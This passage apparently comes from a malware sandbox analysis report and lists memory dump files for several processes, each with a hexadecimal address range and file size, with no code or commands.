                                                                                        • memory/2444-80-0x00007FFF55070000-0x00007FFF55093000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/2444-78-0x00007FFF550A0000-0x00007FFF550B9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2444-76-0x00007FFF550C0000-0x00007FFF550ED000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2444-51-0x00007FFF59F40000-0x00007FFF59F64000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2444-353-0x00007FFF54E80000-0x00007FFF54E99000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2444-138-0x00007FFF45BB0000-0x00007FFF461A2000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/2444-357-0x00007FFF45180000-0x00007FFF456A9000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2444-356-0x00007FFF456B0000-0x00007FFF4577D000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2444-355-0x00007FFF54E40000-0x00007FFF54E73000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2444-352-0x00007FFF45780000-0x00007FFF458FE000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2444-351-0x00007FFF55070000-0x00007FFF55093000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/2444-347-0x00007FFF59F40000-0x00007FFF59F64000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2444-346-0x00007FFF45BB0000-0x00007FFF461A2000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/2444-371-0x00007FFF456B0000-0x00007FFF4577D000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2444-361-0x00007FFF45BB0000-0x00007FFF461A2000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/2444-374-0x00007FFF58D80000-0x00007FFF58D8D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2444-384-0x00007FFF54E40000-0x00007FFF54E73000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2444-383-0x00007FFF59DB0000-0x00007FFF59DBD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2444-382-0x00007FFF54E80000-0x00007FFF54E99000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2444-381-0x00007FFF45780000-0x00007FFF458FE000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2444-380-0x00007FFF55070000-0x00007FFF55093000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/2444-379-0x00007FFF550A0000-0x00007FFF550B9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2444-378-0x00007FFF550C0000-0x00007FFF550ED000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2444-377-0x00007FFF5E4A0000-0x00007FFF5E4AF000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2444-375-0x00007FFF45060000-0x00007FFF4517C000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2444-373-0x00007FFF505F0000-0x00007FFF50604000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/4460-119-0x000001EDEFF20000-0x000001EDEFF42000-memory.dmp

                                                                                          Filesize

                                                                                          136KB

                                                                                        • memory/4904-240-0x000001F1CF820000-0x000001F1CF828000-memory.dmp

                                                                                          Filesize

                                                                                          32KB